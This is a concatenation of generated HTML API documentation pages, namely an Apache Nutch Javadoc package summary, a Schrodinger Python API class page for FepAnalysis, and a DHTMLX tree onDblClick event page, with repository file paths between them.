BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_top_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Package</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Class</FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-use.html"><FONT CLASS="NavBarFont1"><B>Use</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;<A HREF="../../../../../org/apache/nutch/urlfilter/regex/package-summary.html"><B>PREV PACKAGE</B></A>&nbsp; &nbsp;<A HREF="../../../../../org/apache/nutch/urlfilter/validator/package-summary.html"><B>NEXT PACKAGE</B></A></FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../index.html?org/apache/nutch/urlfilter/suffix/package-summary.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="package-summary.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_top"></A> <!-- ========= END OF TOP NAVBAR ========= --> <HR> <H2> Package org.apache.nutch.urlfilter.suffix </H2> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> <B>Class Summary</B></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../../../org/apache/nutch/urlfilter/suffix/SuffixURLFilter.html" title="class in org.apache.nutch.urlfilter.suffix">SuffixURLFilter</A></B></TD> <TD>Filters URLs based on a file of URL suffixes.</TD> </TR> </TABLE> &nbsp; <P> <DL> </DL> <HR> <!-- ======= START OF BOTTOM NAVBAR ====== --> <A NAME="navbar_bottom"><!-- --></A> <A HREF="#skip-navbar_bottom" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_bottom_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Package</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Class</FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-use.html"><FONT CLASS="NavBarFont1"><B>Use</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;<A HREF="../../../../../org/apache/nutch/urlfilter/regex/package-summary.html"><B>PREV PACKAGE</B></A>&nbsp; &nbsp;<A HREF="../../../../../org/apache/nutch/urlfilter/validator/package-summary.html"><B>NEXT PACKAGE</B></A></FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../index.html?org/apache/nutch/urlfilter/suffix/package-summary.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="package-summary.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_bottom"></A> <!-- ======== END OF BOTTOM NAVBAR ======= --> <HR> Copyright &copy; 2012 The Apache Software Foundation </BODY> </HTML>
Schrodinger/Schrodinger_2012_docs/python_api/api/schrodinger.application.desmond.stage.FepAnalysis-class.html
platinhom/ManualHom
<?xml version="1.0" encoding="ascii"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>schrodinger.application.desmond.stage.FepAnalysis</title> <link rel="stylesheet" href="epydoc.css" type="text/css" /> <script type="text/javascript" src="epydoc.js"></script> </head> <body bgcolor="white" text="black" link="blue" vlink="#204080" alink="#204080"> <!-- ==================== NAVIGATION BAR ==================== --> <table class="navbar" border="0" width="100%" cellpadding="0" bgcolor="#a0c0ff" cellspacing="0"> <tr valign="middle"> <!-- Home link --> <th>&nbsp;&nbsp;&nbsp;<a href="schrodinger-module.html">Home</a>&nbsp;&nbsp;&nbsp;</th> <!-- Tree link --> <th>&nbsp;&nbsp;&nbsp;<a href="module-tree.html">Trees</a>&nbsp;&nbsp;&nbsp;</th> <!-- Index link --> <th>&nbsp;&nbsp;&nbsp;<a href="identifier-index.html">Indices</a>&nbsp;&nbsp;&nbsp;</th> <!-- Help link --> <th>&nbsp;&nbsp;&nbsp;<a href="help.html">Help</a>&nbsp;&nbsp;&nbsp;</th> <!-- Project homepage --> <th class="navbar" align="right" width="100%"> <table border="0" cellpadding="0" cellspacing="0"> <tr><th class="navbar" align="center" >Suite 2012 Schrodinger Python API</th> </tr></table></th> </tr> </table> <table width="100%" cellpadding="0" cellspacing="0"> <tr valign="top"> <td width="100%"> <span class="breadcrumbs"> schrodinger :: application :: desmond :: stage :: FepAnalysis :: Class&nbsp;FepAnalysis </span> </td> <td> <table cellpadding="0" cellspacing="0"> <!-- hide/show private --> <tr><td align="right"><span class="options">[<a href="javascript:void(0);" class="privatelink" onclick="toggle_private();">hide&nbsp;private</a>]</span></td></tr> <tr><td align="right"><span class="options" >[<a href="frames.html" target="_top">frames</a >]&nbsp;|&nbsp;<a href="schrodinger.application.desmond.stage.FepAnalysis-class.html" target="_top">no&nbsp;frames</a>]</span></td></tr> </table> </td> </tr> </table> <!-- ==================== CLASS DESCRIPTION ==================== --> <h1 class="epydoc">Class FepAnalysis</h1><p class="nomargin-top"></p> <pre class="base-tree"> object --+ | <a href="schrodinger.application.desmond.picklejar.Picklable-class.html">picklejar.Picklable</a> --+ | <a href="schrodinger.application.desmond.cmj.StageBase-class.html">cmj.StageBase</a> --+ | <strong class="uidshort">FepAnalysis</strong> </pre> <hr /> <!-- ==================== NESTED CLASSES ==================== --> <a name="section-NestedClasses"></a> <table class="summary" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr bgcolor="#70b0f0" class="table-header"> <td colspan="2" class="table-header"> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tr valign="top"> <td align="left"><span class="table-header">Nested Classes</span></td> <td align="right" valign="top" ><span class="options">[<a href="#section-NestedClasses" class="privatelink" onclick="toggle_private();" >hide private</a>]</span></td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <a href="schrodinger.application.desmond.stage.FepAnalysis.Structure-class.html" class="summary-name">Structure</a> </td> </tr> <tr> <td colspan="2" class="summary"> <p class="indent-wrapped-lines"><b>Inherited from <code><a href="schrodinger.application.desmond.cmj.StageBase-class.html">cmj.StageBase</a></code></b>: <code><a href="schrodinger.application.desmond.cmj.StageBase.__metaclass__-class.html">__metaclass__</a></code> </p> </td> </tr> </table> <!-- ==================== INSTANCE METHODS ==================== --> <a name="section-InstanceMethods"></a> <table class="summary" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr bgcolor="#70b0f0" class="table-header"> <td colspan="2" class="table-header"> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tr valign="top"> <td align="left"><span class="table-header">Instance Methods</span></td> <td align="right" valign="top" ><span class="options">[<a href="#section-InstanceMethods" class="privatelink" onclick="toggle_private();" >hide private</a>]</span></td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a href="schrodinger.application.desmond.stage.FepAnalysis-class.html#PARAM" class="summary-sig-name">PARAM</a>(<span class="summary-sig-arg">...</span>)</span></td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a href="schrodinger.application.desmond.stage.FepAnalysis-class.html#__init__" class="summary-sig-name">__init__</a>(<span class="summary-sig-arg">self</span>, <span class="summary-sig-arg">*arg</span>, <span class="summary-sig-arg">**kwarg</span>)</span><br /> x.__init__(...) initializes x; see help(type(x)) for signature</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a href="schrodinger.application.desmond.stage.FepAnalysis-class.html#crunch" class="summary-sig-name">crunch</a>(<span class="summary-sig-arg">self</span>)</span><br /> This is where jobs of this stage are created.</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a href="schrodinger.application.desmond.stage.FepAnalysis-class.html#hook_captured_successful_job" class="summary-sig-name">hook_captured_successful_job</a>(<span class="summary-sig-arg">self</span>, <span class="summary-sig-arg">job</span>)</span></td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a href="schrodinger.application.desmond.stage.FepAnalysis-class.html#poststage" class="summary-sig-name">poststage</a>(<span class="summary-sig-arg">self</span>)</span></td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td colspan="2" class="summary"> <p class="indent-wrapped-lines"><b>Inherited from <code><a href="schrodinger.application.desmond.cmj.StageBase-class.html">cmj.StageBase</a></code></b>: <code><a href="schrodinger.application.desmond.cmj.StageBase-class.html#__getstate__">__getstate__</a></code>, <code><a href="schrodinger.application.desmond.cmj.StageBase-class.html#__setstate__">__setstate__</a></code>, <code><a href="schrodinger.application.desmond.cmj.StageBase-class.html#capture">capture</a></code>, <code><a href="schrodinger.application.desmond.cmj.StageBase-class.html#check_param">check_param</a></code>, <code><a href="schrodinger.application.desmond.cmj.StageBase-class.html#describe">describe</a></code>, <code><a href="schrodinger.application.desmond.cmj.StageBase-class.html#determine">determine</a></code>, <code><a href="schrodinger.application.desmond.cmj.StageBase-class.html#pack_stage">pack_stage</a></code>, <code><a href="schrodinger.application.desmond.cmj.StageBase-class.html#prestage">prestage</a></code>, <code><a href="schrodinger.application.desmond.cmj.StageBase-class.html#push">push</a></code>, <code><a href="schrodinger.application.desmond.cmj.StageBase-class.html#release">release</a></code> </p> <div class="private"> <p class="indent-wrapped-lines"><b>Inherited from <code><a href="schrodinger.application.desmond.cmj.StageBase-class.html">cmj.StageBase</a></code></b> (private): <code><a href="schrodinger.application.desmond.cmj.StageBase-class.html#_effect" onclick="show_private();">_effect</a></code>, <code><a href="schrodinger.application.desmond.cmj.StageBase-class.html#_gen_unique_jobname" onclick="show_private();">_gen_unique_jobname</a></code>, <code><a href="schrodinger.application.desmond.cmj.StageBase-class.html#_get_jobname_and_dir" onclick="show_private();">_get_jobname_and_dir</a></code>, <code><a href="schrodinger.application.desmond.cmj.StageBase-class.html#_get_macro_dict" onclick="show_private();">_get_macro_dict</a></code>, <code><a href="schrodinger.application.desmond.cmj.StageBase-class.html#_log" onclick="show_private();">_log</a></code>, <code><a href="schrodinger.application.desmond.cmj.StageBase-class.html#_param_jlaunch_opt_check" onclick="show_private();">_param_jlaunch_opt_check</a></code>, <code><a href="schrodinger.application.desmond.cmj.StageBase-class.html#_print" onclick="show_private();">_print</a></code>, <code><a href="schrodinger.application.desmond.cmj.StageBase-class.html#_reg_param_postcheck" onclick="show_private();">_reg_param_postcheck</a></code>, <code><a href="schrodinger.application.desmond.cmj.StageBase-class.html#_reg_param_precheck" onclick="show_private();">_reg_param_precheck</a></code>, <code><a href="schrodinger.application.desmond.cmj.StageBase-class.html#_set" onclick="show_private();">_set</a></code> </p></div> <p class="indent-wrapped-lines"><b>Inherited from <code>object</code></b>: <code>__delattr__</code>, <code>__format__</code>, <code>__getattribute__</code>, <code>__hash__</code>, <code>__new__</code>, <code>__reduce__</code>, <code>__reduce_ex__</code>, <code>__repr__</code>, <code>__setattr__</code>, <code>__sizeof__</code>, <code>__str__</code>, <code>__subclasshook__</code> </p> </td> </tr> </table> <!-- ==================== CLASS VARIABLES ==================== --> <a name="section-ClassVariables"></a> <table class="summary" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr bgcolor="#70b0f0" class="table-header"> <td colspan="2" class="table-header"> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tr valign="top"> <td align="left"><span class="table-header">Class Variables</span></td> <td align="right" valign="top" ><span class="options">[<a href="#section-ClassVariables" class="privatelink" onclick="toggle_private();" >hide private</a>]</span></td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <a name="NAME"></a><span class="summary-name">NAME</span> = <code title="'fep_analysis'"><code class="variable-quote">'</code><code class="variable-string">fep_analysis</code><code class="variable-quote">'</code></code> </td> </tr> <tr> <td colspan="2" class="summary"> <p class="indent-wrapped-lines"><b>Inherited from <code><a href="schrodinger.application.desmond.cmj.StageBase-class.html">cmj.StageBase</a></code></b>: <code><a href="schrodinger.application.desmond.cmj.StageBase-class.html#count">count</a></code>, <code><a href="schrodinger.application.desmond.cmj.StageBase-class.html#stage_cls">stage_cls</a></code>, <code><a href="schrodinger.application.desmond.cmj.StageBase-class.html#stage_obj">stage_obj</a></code> </p> </td> </tr> </table> <!-- ==================== PROPERTIES ==================== --> <a name="section-Properties"></a> <table class="summary" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr bgcolor="#70b0f0" class="table-header"> <td colspan="2" class="table-header"> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tr valign="top"> <td align="left"><span class="table-header">Properties</span></td> <td align="right" valign="top" ><span class="options">[<a href="#section-Properties" class="privatelink" onclick="toggle_private();" >hide private</a>]</span></td> </tr> </table> </td> </tr> <tr> <td colspan="2" class="summary"> <p class="indent-wrapped-lines"><b>Inherited from <code>object</code></b>: <code>__class__</code> </p> </td> </tr> </table> <!-- ==================== METHOD DETAILS ==================== --> <a name="section-MethodDetails"></a> <table class="details" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr bgcolor="#70b0f0" class="table-header"> <td colspan="2" class="table-header"> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tr valign="top"> <td align="left"><span class="table-header">Method Details</span></td> <td align="right" valign="top" ><span class="options">[<a href="#section-MethodDetails" class="privatelink" onclick="toggle_private();" >hide private</a>]</span></td> </tr> </table> </td> </tr> </table> <a name="PARAM"></a> <div> <table class="details" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr><td> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr valign="top"><td> <h3 class="epydoc"><span class="sig"><span class="sig-name">PARAM</span>(<span class="sig-arg">...</span>)</span> </h3> </td><td align="right" valign="top" >&nbsp; </td> </tr></table> <dl class="fields"> <dt>Overrides: <a href="schrodinger.application.desmond.cmj.StageBase-class.html#PARAM">cmj.StageBase.PARAM</a> </dt> </dl> </td></tr></table> </div> <a name="__init__"></a> <div> <table class="details" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr><td> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr valign="top"><td> <h3 class="epydoc"><span class="sig"><span class="sig-name">__init__</span>(<span class="sig-arg">self</span>, <span class="sig-arg">*arg</span>, <span class="sig-arg">**kwarg</span>)</span> <br /><em class="fname">(Constructor)</em> </h3> </td><td align="right" valign="top" >&nbsp; </td> </tr></table> <p>x.__init__(...) initializes x; see help(type(x)) for signature</p> <dl class="fields"> <dt>Overrides: object.__init__ </dt> </dl> </td></tr></table> </div> <a name="crunch"></a> <div> <table class="details" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr><td> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr valign="top"><td> <h3 class="epydoc"><span class="sig"><span class="sig-name">crunch</span>(<span class="sig-arg">self</span>)</span> </h3> </td><td align="right" valign="top" >&nbsp; </td> </tr></table> <p>This is where jobs of this stage are created. This function should be overriden by the subclass.</p> <dl class="fields"> <dt>Overrides: <a href="schrodinger.application.desmond.cmj.StageBase-class.html#crunch">cmj.StageBase.crunch</a> </dt> </dl> </td></tr></table> </div> <a name="hook_captured_successful_job"></a> <div> <table class="details" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr><td> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr valign="top"><td> <h3 class="epydoc"><span class="sig"><span class="sig-name">hook_captured_successful_job</span>(<span class="sig-arg">self</span>, <span class="sig-arg">job</span>)</span> </h3> </td><td align="right" valign="top" >&nbsp; </td> </tr></table> <dl class="fields"> <dt>Overrides: <a href="schrodinger.application.desmond.cmj.StageBase-class.html#hook_captured_successful_job">cmj.StageBase.hook_captured_successful_job</a> </dt> </dl> </td></tr></table> </div> <a name="poststage"></a> <div> <table class="details" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr><td> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr valign="top"><td> <h3 class="epydoc"><span class="sig"><span class="sig-name">poststage</span>(<span class="sig-arg">self</span>)</span> </h3> </td><td align="right" valign="top" >&nbsp; </td> </tr></table> <dl class="fields"> <dt>Overrides: <a href="schrodinger.application.desmond.cmj.StageBase-class.html#poststage">cmj.StageBase.poststage</a> </dt> </dl> </td></tr></table> </div> <br /> <!-- ==================== NAVIGATION BAR ==================== --> <table class="navbar" border="0" width="100%" cellpadding="0" bgcolor="#a0c0ff" cellspacing="0"> <tr valign="middle"> <!-- Home link --> <th>&nbsp;&nbsp;&nbsp;<a href="schrodinger-module.html">Home</a>&nbsp;&nbsp;&nbsp;</th> <!-- Tree link --> <th>&nbsp;&nbsp;&nbsp;<a href="module-tree.html">Trees</a>&nbsp;&nbsp;&nbsp;</th> <!-- Index link --> <th>&nbsp;&nbsp;&nbsp;<a href="identifier-index.html">Indices</a>&nbsp;&nbsp;&nbsp;</th> <!-- Help link --> <th>&nbsp;&nbsp;&nbsp;<a href="help.html">Help</a>&nbsp;&nbsp;&nbsp;</th> <!-- Project homepage --> <th class="navbar" align="right" width="100%"> <table border="0" cellpadding="0" cellspacing="0"> <tr><th class="navbar" align="center" >Suite 2012 Schrodinger Python API</th> </tr></table></th> </tr> </table> <table border="0" cellpadding="0" cellspacing="0" width="100%%"> <tr> <td align="left" class="footer"> Generated by Epydoc 3.0.1 on Tue Sep 25 02:23:02 2012 </td> <td align="right" class="footer"> <a target="mainFrame" href="http://epydoc.sourceforge.net" >http://epydoc.sourceforge.net</a> </td> </tr> </table> <script type="text/javascript"> <!-- // Private objects are initially displayed (because if // javascript is turned off then we want them to be // visible); but by default, we want to hide them. So hide // them unless we have a cookie that says to show them. checkCookie(); // --> </script> </body> </html>
vendor/assets/dhtmlx/docsExplorer/dhtmlxtree/dhtmlxtree___event_ondblclick.html
ManageIQ/dhtmlx-rails
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><link rel="stylesheet" href="../codebase/default.css" type="text/css" media="screen" title="no title" charset="utf-8"><title> dhtmlxtree:event_ondblclick [DHX documentation] </title></head> <body> <div class="dokuwiki"> <div class="stylehead"> <div class="header"> <a class="logo" href="http://dhtmlx.com" title="DHTMLX Home Page"></a> <span class="tittle-dhtmlx">DHTMLX Docs & Samples Explorer</span> <div class="search-field"> <form action="/dhtmlx/docs/doku.php" accept-charset="utf-8" id="dw__search"><div class="no"><input type="hidden" name="do" value="search" /><input type="text" id="qsearch__in" accesskey="f" name="id" title="Search" /><button type="submit"></button><div id="qsearch__out" class="ajax_qsearch JSpopup"></div></div></form> </div> <div class="buttons"> <a class="doc"></a> <a title="DHTMLX Samples homepage" href="../samples.html" class="sample"/></a> </div> <!-- <div class="pagename"> [[<a href="#" title="Backlinks">dhtmlxtree:event_ondblclick</a>]] </div> <div class="logo"> <a href="/dhtmlx/docs/doku.php" name="dokuwiki__top" id="dokuwiki__top" accesskey="h" title="[H]">DHX documentation</a> </div> <div class="clearer"></div>--> </div> <!-- <div class="bar" id="bar__top"> <div class="bar-left" id="bar__topleft"> <form class="button btn_edit" method="post" action="/dhtmlx/docs/doku.php"><div class="no"><input type="hidden" name="do" value="edit" /><input type="hidden" name="rev" value="" /><input type="hidden" name="id" value="dhtmlxtree:event_ondblclick" /><input type="submit" value="Edit this page" class="button" accesskey="e" title="Edit this page [E]" /></div></form> <form class="button btn_revs" method="get" action="/dhtmlx/docs/doku.php"><div class="no"><input type="hidden" name="do" value="revisions" /><input type="hidden" name="id" value="dhtmlxtree:event_ondblclick" /><input type="submit" value="Old revisions" class="button" accesskey="o" title="Old revisions [O]" /></div></form> </div> <div class="bar-right" id="bar__topright"> <form class="button btn_recent" method="get" action="/dhtmlx/docs/doku.php"><div class="no"><input type="hidden" name="do" value="recent" /><input type="hidden" name="id" value="dhtmlxtree:event_ondblclick" /><input type="submit" value="Recent changes" class="button" accesskey="r" title="Recent changes [R]" /></div></form> <form action="/dhtmlx/docs/doku.php" accept-charset="utf-8" id="dw__search"><div class="no"><input type="hidden" name="do" value="search" /><input type="text" id="qsearch__in" accesskey="f" name="id" title="Search" /><button type="submit"></button><div id="qsearch__out" class="ajax_qsearch JSpopup"></div></div></form>&nbsp; </div> <div class="clearer"></div> </div> --> <!-- <div class="breadcrumbs"> <span class="bchead">Trace:</span> <span class="bcsep">&raquo;</span> <span class="curid"><a href="/dhtmlx/docs/doku.php?id=dhtmlxtree:event_ondblclick" class="breadcrumbs" title="dhtmlxtree:event_ondblclick">event_ondblclick</a></span> </div> --> </div> <div class="page"> <!-- wikipage start --> <p> <div class='backlinks'><div class='backlink last_backlink'><img src="icons___file.gif" class="media" alt="" /><a href="../index.html" class="wikilink1" title="start">Index</a></div><div class='arrow'></div><div class='backlink last_backlink'><img src="icons___tree.gif" class="media" alt="" /><a href=index.html class="wikilink1" title="dhtmlxtree:toc">dhtmlxtree</a></div></div> </p> <h2><a name="ondblclick_event" id="ondblclick_event">onDblClick Event</a></h2> <div class="level2"> <p> This event calls user-defined handlers (if there are any) and passes the following parameter: </p> <ul> <li class="level1"><div class="li"> id - id of the node that was doubleclicked.</div> </li> </ul> <pre class="code javascript"> tree.<span class="me1">attachEvent</span><span class="br0">&#40;</span><span class="st0">&quot;onDblClick&quot;</span><span class="sy0">,</span> <span class="kw2">function</span><span class="br0">&#40;</span>id<span class="br0">&#41;</span><span class="br0">&#123;</span><span class="br0">&#125;</span><span class="br0">&#41;</span>; &nbsp;</pre> <p> The event returns: </p> <p> true - confirms opening|closing;<br/> false - denies opening|closing. </p> </div> <div class="secedit"><form class="button btn_secedit" method="post" action="/dhtmlx/docs/doku.php"><div class="no"><input type="hidden" name="do" value="edit" /><input type="hidden" name="lines" value="54-" /><input type="hidden" name="rev" value="1335474000" /><input type="hidden" name="id" value="dhtmlxtree:event_ondblclick" /><input type="submit" value="Edit" class="button" title="onDblClick Event" /></div></form></div> <!-- wikipage stop --> </div> <div class="clearer">&nbsp;</div> <div class="stylefoot"> <div class="meta"> <div class="user"> </div> <!-- <div class="doc"> dhtmlxtree/event_ondblclick.txt &middot; Last modified: 2012/04/27 00:00 (external edit) </div> </div>--> <!--<div class="bar" id="bar__bottom">--> <!--<div class="bar-left" id="bar__bottomleft">--> <!--<form class="button btn_edit" method="post" action="/dhtmlx/docs/doku.php"><div class="no"><input type="hidden" name="do" value="edit" /><input type="hidden" name="rev" value="" /><input type="hidden" name="id" value="dhtmlxtree:event_ondblclick" /><input type="submit" value="Edit this page" class="button" accesskey="e" title="Edit this page [E]" /></div></form>--> <!--<form class="button btn_revs" method="get" action="/dhtmlx/docs/doku.php"><div class="no"><input type="hidden" name="do" value="revisions" /><input type="hidden" name="id" value="dhtmlxtree:event_ondblclick" /><input type="submit" value="Old revisions" class="button" accesskey="o" title="Old revisions [O]" /></div></form>--> <!--</div>--> <!--<div class="bar-right" id="bar__bottomright">--> <!----> <!----> <!----> <!----> <!----> <!--<form class="button btn_index" method="get" action="/dhtmlx/docs/doku.php"><div class="no"><input type="hidden" name="do" value="index" /><input type="hidden" name="id" value="dhtmlxtree:event_ondblclick" /><input type="submit" value="Index" class="button" accesskey="x" title="Index [X]" /></div></form>--> <!--<a class="nolink" href="#dokuwiki__top"><input type="button" class="button" value="Back to top" onclick="window.scrollTo(0, 0)" title="Back to top" /></a>&nbsp;--> <!--</div>--> <!--<div class="clearer"></div>--> <!--</div>--> </div> </div> <div class="footerinc"> </div> <div class="no"><img src="/dhtmlx/docs/lib/exe/indexer.php?id=dhtmlxtree%3Aevent_ondblclick&amp;1383917641" width="1" height="1" alt="" /></div> <div class="footer"> <div class="footer-logo"></div> <div class="copyright">Copyright © 2013 Dinamenta, UAB<br />All rights reserved.</div> <form class="button btn_edit" method="post" action="/dhtmlx/docs/doku.php"><div class="no"><input type="hidden" name="do" value="edit" /><input type="hidden" name="rev" value="" /><input type="hidden" name="id" value="dhtmlxtree:event_ondblclick" /><input type="submit" value="Edit this page" class="button" accesskey="e" title="Edit this page [E]" /></div></form> </div> </body> </html>
subtitle_play/templates/show.html
theburn/subtitle_play
